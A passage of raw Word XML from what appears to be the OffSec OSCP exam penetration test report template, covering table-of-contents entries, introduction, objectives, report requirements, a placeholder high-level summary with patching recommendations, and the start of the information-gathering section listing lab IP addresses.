            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5.2.1 Initial Access – RDP login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>24</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D46D0DA" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="400"/>
          </w:pPr>
          <w:hyperlink w:anchor="_1ci93xb">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5.2.2 Post-Exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>24</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40C70945" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_2bn6wsx">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5.3 DC – 10.5.5.30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>25</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EBB803F" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="400"/>
          </w:pPr>
          <w:hyperlink w:anchor="_qsh70q">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5.3.1 Initial Access – Remote Commands Execution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>25</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A33C51B" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="400"/>
          </w:pPr>
          <w:hyperlink w:anchor="_1pxezwc">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5.3.2 Post-Exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>26</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F1D7CF1" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:color w:val="000000"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="094F051E" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B1A867" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00E20BC9">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2DE36F" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00E20BC9">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760527EB" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00E20BC9">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37840207" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> OSCP Exam Penetration Test Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4E8DE0" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_30j0zll" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t>1.1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A5A139"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 xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab and Exam penetration test report contains all efforts that were conducted </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pass the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> course. This report should contain all items that were used to pass the overall exam and it will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Certified Professional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B26A8D4" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_1fob9te" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>1.2 Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35278B6F"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 xml:space="preserve">The objective of this assessment is to perform an internal penetration test against the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab and Exam network. The student is tasked with following a methodical approach to obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An example page has already been created for you in the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491CE090" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_3znysh7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t>1.3 Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259018A2" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00000000" w:rsidP="00E20BC9">
      <w:pPr>
        <w:spacing w:after="200" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>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The student will be required to fill out this penetration testing report fully and to include the following sections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E14F23C" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00000000" w:rsidP="00E20BC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E20BC9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Overall High-Level Summary and Recommendations (non-technical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512AED04" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00000000" w:rsidP="00E20BC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E20BC9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Methodology walkthrough and detailed outline of steps </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E20BC9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>taken</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18502D0F" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00000000" w:rsidP="00E20BC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E20BC9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF03EC1" w14:textId="03A2D19D" w:rsidR="00CB67CB" w:rsidRPr="00E20BC9" w:rsidRDefault="00000000" w:rsidP="00E20BC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E20BC9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Any additional items that were not included</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A442D0" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3581E952" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00E20BC9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5780C212" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00E20BC9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A3F118" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_2et92p0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2. High-Level Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1364DCCB"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 xml:space="preserve">John Doe was tasked with performing an internal penetration test towards </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> those of a hacker and attempt to infiltrate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OffSec’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> internal lab systems – the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>THINC.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain. John’s overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F771EA1"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 xml:space="preserve">When performing the internal penetration test, there were several alarming vulnerabilities that were identified on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OffSec’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> network. When performing the attacks, John was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.  During the testing, John had administrative level access to multiple systems. All systems were successfully </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exploited</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and access granted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DED9E2" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_tyjcwt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t>2.1 Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B59934E"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 xml:space="preserve">John recommends patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>at a later date</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3675203B" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_3dy6vkm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t>3. Methodologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46624BE1"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 xml:space="preserve">John utilized a widely adopted approach to performing penetration testing that is effective in testing how well the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Labs and Exam environments are secure. Below is a breakout of how John was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405C56A" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_1t3h5sf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t>3.1 Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7342B5"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The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, John was tasked with exploiting the lab and exam network. The specific IP addresses were:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD2F35E" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exam Network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF4048" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.232.55, 172.16.203.134, 172.16.203.135, 172.16.203.136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E1C98B" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_4d34og8" w:colFirst="0" w:colLast="0"/>
